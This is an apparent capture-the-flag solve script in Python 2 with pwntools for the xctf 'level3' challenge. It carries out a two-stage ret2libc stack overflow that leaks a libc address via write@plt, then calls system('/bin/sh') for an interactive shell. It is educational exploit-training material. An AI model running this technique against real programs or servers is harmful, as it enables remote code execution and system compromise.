xctf pwn level3
#-*-coding:utf-8-*-
# Two-stage ret2libc solve script for the xctf "level3" challenge (Python 2 /
# pwntools syntax: `print` statements and `.next()` on the search iterator).
#
# Stage 1 overflows the stack buffer and returns into write@plt to print one
# GOT entry, which reveals where libc is loaded in the target process.
# Stage 2 overflows again and returns into system() with "/bin/sh" from the
# same libc.  Both stages hard-code absolute addresses (vulnfun, the PLT/GOT
# slots), so this presumably only works against a non-PIE build of ./level3
# — confirm with checksec before assuming the offsets are stable.
from pwn import *

# Local process by default; the commented-out line is the remote endpoint.
p = process('./level3')
#p = remote("111.198.29.45","36722")

elf = ELF('./level3')
# The libc used for symbol offsets MUST be the one the target actually loads;
# the leaked pointer is only meaningful relative to that build.  The commented
# alternative is presumably the libc shipped with the remote challenge.
libc = ELF('/lib/i386-linux-gnu/libc.so.6')
#libc = ELF('./libc_32.so.6')

# PLT stub of write(): callable without knowing libc's base.
write_plt = elf.plt['write']
print "write_plt: " + hex(write_plt)
# print hex(elf.symbols['write'])

# NOTE(review): despite the name, this is the GOT slot of __libc_start_main,
# not of write; the leak below and the "write_got"/"write_addr" labels all
# refer to __libc_start_main.
write_got = elf.got['__libc_start_main']
print "write_got: " + hex(write_got)

# Offsets inside the chosen libc; combined with the leak they give runtime
# addresses.
libc_main = libc.symbols['__libc_start_main']
print "write_libc: " + hex(libc_main)
system_libc = libc.symbols['system']
print "system_libc: " + hex(system_libc)

# Fixed return target used after each stage so the overflow can be triggered
# again; presumably the entry of the vulnerable function (check in a
# disassembler).  A non-PIE binary is assumed, as noted above.
vulnfun = 0x804844B
# pause()

# Stage 1 chain, equivalent to: write(1, write_got, 4); then return to vulnfun.
#write(1,write_got,4)
# Drain whatever the program prints before reading input.
p.recv()
# 140 bytes of padding reach the saved return address — assumes no stack
# canary between the buffer and the frame (confirm with checksec).
payload = 140*'a' + p32(write_plt) + p32(vulnfun)
payload += p32(1) + p32(write_got) + p32(4)
p.sendline(payload)

# The first 4 bytes received are taken to be the leaked pointer.  If the
# target emits any other output first (a prompt, an echo), this misparses
# silently — consider anchoring the read on known output before recv(4).
write_addr = u32(p.recv(4))
print "write_addr: " + hex(write_addr)
# Manual pause, presumably to attach a debugger before stage 2.
pause()

# `offset` is really the libc load base: leaked runtime address minus the
# symbol's offset within the library.
offset = write_addr - libc_main
system_addr = offset + system_libc
# Python 2 iterator protocol; under Python 3 this would be next(libc.search(...)).
binsh = libc.search("/bin/sh").next()
binsh_addr = offset + binsh
print "binsh_addr: " + hex(binsh_addr)

# Stage 2 chain, equivalent to: system(binsh_addr) with vulnfun as the fake
# return address of system().
payload = 140*'a' + p32(system_addr) + p32(vulnfun) + p32(binsh_addr)
p.sendline(payload)
p.interactive()